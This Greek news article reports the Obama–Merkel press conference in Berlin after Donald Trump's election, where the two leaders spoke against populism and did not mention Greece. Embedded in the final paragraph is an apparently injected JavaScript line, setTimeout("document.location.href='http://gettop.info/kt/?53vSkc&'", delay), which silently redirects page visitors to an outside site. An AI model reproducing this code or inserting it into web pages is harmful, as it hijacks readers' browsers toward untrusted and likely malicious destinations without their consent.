Χωρίς αναφορές στην Ελλάδα οι κοινές δηλώσεις Μέρκελ-Ομπάμα

0
15

 

Η κοινή συνέντευξη τύπου του Αμερικανού προέδρου και της Γερμανίδας Καγκελαρίου Άνγκελας Μέρκελ ξεκίνησε σε πολύ θερμό κλίμα με τον Μπαράκ Ομπάμα να εποστρατεύει το γνωστό του χιούμορ.

«Πάντα περνάω υπέροχα στην Γερμανία. Είναι η έκτη επίσκεψη μου εδώ και πάντα καταφέρνω να χάνω το Oktoberfest. Ανυπομονώ την επόμενη χρονιά να έρθω δεδομένου ότι θα έχω αρκετό χρόνο να διασκεδάσω», είπε.

Οι δυο ηγέτες έστειλαν κοινό μήνυμα για την αντιμετώπιση του λαϊκισμού που επεκτείνεται με μεγάλη ταχύτητα στην Δύση, χωρίς να κάνουν καμία αναφορά στην Ελλάδα ή το ζήτημα του χρέους.

Η διμερής συνεργασία ΗΠΑ-Γερμανίας στο εμπόριο, το κλίμα και τις διεθνείς προκλήσεις με την άνοδο του λαϊκισμού τέθηκαν επί τάπητος στη συνάντηση της Γερμανίδας Καγκελαρίου, Άνγκελα Μέρκελ με τον Μπαράκ Ομπάμα ο οποίος επισκέπτεται το Βερολίνο στο τελευταίο του ταξίδι στο εξωτερικό ως Πρόεδρος των ΗΠΑ.

Υπό τη σκιά της εκλογής του Ντόναλντ Τραμπ στο Λευκό Οίκο, οι δύο ηγέτες επέμειναν ότι οι κυβερνήσεις πρέπει να βρουν νέους τρόπους για να έλθουν σε επαφή με τους πολίτες που είναι φοβισμένοι ή απογοητευμένοι από τις συνέπειες τις παγκοσμιοποίησης και την ταχύτατη τεχνολογική-οικονομική αλλαγή που τη συνοδεύει.

«Δεν μπορούμε να επιστρέψουμε σε ωμούς εθνικισμούς», τόνισε ο κ. Ομπάμα, ενώ από την πλευρά της η κα Μέρκελ επισήμανε πως ο κόσμος μπορεί μεν να «πλάσει» την παγκοσμιοποίηση και να ελέγξει τις συνέπειές της, αλλά δεν μπορεί να επιστρέψει στην προηγούμενη εποχή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here